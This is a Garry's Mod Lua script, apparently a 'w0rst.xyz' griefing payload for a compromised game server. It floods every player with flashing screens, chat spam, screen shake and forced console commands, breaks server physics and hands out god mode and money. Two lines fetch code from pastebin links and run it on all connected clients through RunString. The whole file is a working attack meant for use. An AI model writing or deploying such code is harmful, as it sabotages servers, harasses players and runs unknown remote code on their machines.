for k,v in pairs(player.GetAll()) do
    BroadcastLua("sound.PlayURL('https://w0rst.xyz/script/sounds/mlg.mp3', 'mono', function(station) station:Play() end)")
    timer.Simple(1, function()
        v:SendLua("hook.Add('HUDPaint', 'Rainbow', function() local cin = math.sin(CurTime() * 10) * 255 surface.SetDrawColor(Color(cin, -cin, cin, 50)) surface.DrawRect(0, 0, ScrW(), ScrH()) end)")
        v:SendLua("hook.Add('Tick', 'Spam', function() chat.AddText(Color(math.Rand(50,200), math.Rand(50,200), math.Rand(50,200)), 'w0rst.xyz - wmenu-memento') end)")
        v.addMoney(1000000000)
        v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE)
        v:SetMaxSpeed(2222); v:SetRunSpeed(2222)
				v:SetJumpPower(999); v:GodEnable()
				RunConsoleCommand('sv_friction', -2)
				RunConsoleCommand('sv_gravity', 300)
				RunConsoleCommand('sv_airaccelerate', 999)
        DarkRP.notify(v, 0, 2.5, "w0rst.xyz - Get Fucked")
        BroadcastLua("http.Fetch('https://pastebin.com/raw/dZbWx8he', RunString)")
        BroadcastLua("http.Fetch('https://pastebin.com/raw/U2ByUzLk', RunString)")
        v:SendLua([[hook.Add('Tick','ShakeScreen', function()
						local me = Player(LocalPlayer():UserID())
						me:ConCommand('escape')
						util.ScreenShake(me:GetPos(), 10, 10, 99999, 9999999)
				end)]])
    end)
end
